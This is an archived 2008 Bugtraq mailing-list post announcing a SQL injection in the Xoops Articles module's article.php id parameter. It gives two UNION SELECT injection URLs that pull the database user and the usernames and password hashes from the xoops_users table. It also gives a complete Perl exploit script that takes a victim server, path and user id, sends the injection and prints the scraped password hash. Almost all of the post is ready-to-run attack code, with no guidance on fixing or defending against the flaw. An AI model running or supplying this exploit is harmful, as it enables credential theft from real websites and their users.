bugtraq - Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [day] [month] [year] [list]

Date: 19 Apr 2008 09:34:13 -0000
From: crazy_kinq@...mail.co.uk
To: bugtraq@...urityfocus.com
Subject: Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection
 ExpL0it

/Cr@...King / http://coderx.org

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

Sql 1-2

article.php?id=3+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),8,9,0,1,2,3,4,5,6,7,8,9,0/*

article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

# Exploit :

#############################################
#Coded By Cr@...King      http://coderx.org]#
#############################################

use IO::Socket;

if (@ARGV != 3)
{
    print "\n-----------------------------------\n";
    print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
    print "-----------------------------------\n";
    print "\n4ever Cra\n";
    print "crazy_kinq[at]hotmail.co.uk\n";
    print "http://coderx.org\n";
    print "\n-----------------------------------\n";
    print "\nKullanim: $0 <server> <path> <uid>\n";
    print "Ornek: $0 www.victim.com /path 1\n";
    print "\n-----------------------------------\n";
    exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort =>
"80");
printf $socket ("GET
%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection:
close\n\n",
$path,$server,$uid);

while(<$socket>)

{
    if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}

# Cr@...King
# http://coderx.org
# crazy_kinq@...mail.co.uk